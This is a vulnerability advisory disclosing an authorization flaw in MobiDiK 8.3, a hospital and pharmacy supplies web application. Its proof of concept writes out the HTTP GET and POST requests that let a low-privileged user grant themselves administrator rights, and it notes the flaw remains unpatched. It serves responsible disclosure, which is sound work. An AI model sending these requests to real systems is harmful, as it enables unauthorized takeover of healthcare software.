Advisory ID: SYSS-2025-058 Product: MobiDiK Manufacturer: Richard Müller GmbH Affected Version(s): 8.3 Tested Version(s): 8.3 Vulnerability Type: Incorrect Authorization (CWE-863) Risk Level: High Solution Status: Open Manufacturer Notification: 2025-09-26 Solution Date: - Public Disclosure: 2025-12-12 CVE Reference: Not yet assigned Author of Advisory: Dennis Caliskan, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: MobiDiK is a web shop for pharmacy supplies. The manufacturer describes the product as follows (see [1]): "Since 1985, MobiDiK (Mobile Datenerfassung im Krankenhaus) has been networking hospital processes using mobile scanners for the benefit of staff on the wards, in the warehouse, and in the pharmacy. [...] MobiDiK is a modular solution that makes it possible to map all customer structures, from large university hospitals to decentralized solutions for logistics companies, using a single system." Due to incorrectly implemented authorization checks, the web application is vulnerable to vertical privilege escalation. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: In the web application's back end, some authorization checks are either performed incorrectly or are missing completely. In the user management settings, an administrator has the ability to define user roles for individual users. The underlying HTTP POST request for setting user privileges can be successfully sent to the web server by low-privileged users, resulting in a change in user privileges. A low-privileged user can thus escalate his privileges and grant themselves administrative privileges. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): 1. Log in to the web application as a low-privileged user and observe the corresponding PHP session ID generated by the web application. 2. Send the following HTTP GET request to the web server. Replace the session ID parameter with your own session ID. The tenant ID identifies which organization your account belongs to. You get the tenant ID by observing the "inst" parameter in the URL when accessing the login page. This parameter takes a string consisting of two parts, e.g . It is not clear what the first part stands for; however, the second part identifies the tenant and is your ID. GET /cx_tab_tab.php?PHPSESSID=&cdx=BENUTZER.CDX&p0=&modus=laden&sw=| HTTP/2 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Priority: u=4 Te: trailers 3. Send the following HTTP POST request to the web server. Replace the session ID parameter with your own session ID. This request will set the user privileges. POST /db_s.php HTTP/2 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 189 Priority: u=4 Te: trailers sql=&titel=&sw=%7C%7C%7C%7CADMIN%7C%7C%7C%7C0%7C31.12.2099%7C0&tsw=A%7EHDZ9270%7E0%7CL%7EHDZ9270%7E0&PHPSESSID=&cdx=BENUTZER.CDX&modus=speichern 4. Log out, reauthenticate in the web application and observe the button in the top left corner. It is now clickable. Click it and select "Administration". 5. You now have administrative control over the web application. For example, you can manage user accounts or restrict access to the web application for specific tenants. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Secure all security-relevant functions through server-side authorization checks in the back end. Make sure that the user has the sufficient privileges to issue the request. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2025-09-19: Vulnerability discovered 2025-09-26: Vulnerability reported to manufacturer 2025-10-06: Vulnerability reported to manufacturer again 2025-12-08: To date, the vendor has not replied to the inquiry 2025-12-12: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for MobiDiK http://www.richard-mueller.de/gesundheitswesen/startseite-gesundheitswesen/ [2] SySS Security Advisory SYSS-2025-058 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-058.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Dennis Caliskan of SySS GmbH. E-Mail: dennis.caliskan@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Dennis_Caliskan.asc Key ID: 0x5E916BF585867B55 Key Fingerprint: 52ED 2BF9 15D9 4965 854A 8336 5E91 6BF5 8586 7B55 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 4.0 URL: https://creativecommons.org/licenses/by/4.0/deed.en